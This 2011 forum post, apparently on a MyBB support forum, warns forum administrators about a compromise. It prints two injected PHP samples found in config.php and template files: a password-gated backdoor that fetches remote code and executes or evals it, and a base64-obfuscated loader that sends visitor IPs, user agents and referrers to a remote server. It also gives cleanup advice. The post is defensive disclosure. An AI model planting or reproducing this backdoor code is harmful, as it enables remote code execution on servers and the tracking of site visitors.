2011-10-15, 05:19 AM
every infected mybb forum must check
inc/config.php
after several blank lines there is a malicious script
i dont know what does this script do ..
any way please remove it soon....
and again search for all index.php and showthread.php in server to remove malicious script
i know this script sending our traffic information to hacker server .. and even possible to run more code on our server later by this script
using "eval" function (so its dangerous..!)
and again dont forget to change mysql and cpanel password
and again my suggestion to change file permission of config.php to 444 (so none can rewrite file again)
inc/config.php
after several blank lines there is a malicious script
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '06f7c042b76e4b04f698c75b7b2777ea'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
i dont know what does this script do ..
any way please remove it soon....
and again search for all index.php and showthread.php in server to remove malicious script
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
i know this script sending our traffic information to hacker server .. and even possible to run more code on our server later by this script
using "eval" function (so its dangerous..!)
and again dont forget to change mysql and cpanel password
and again my suggestion to change file permission of config.php to 444 (so none can rewrite file again)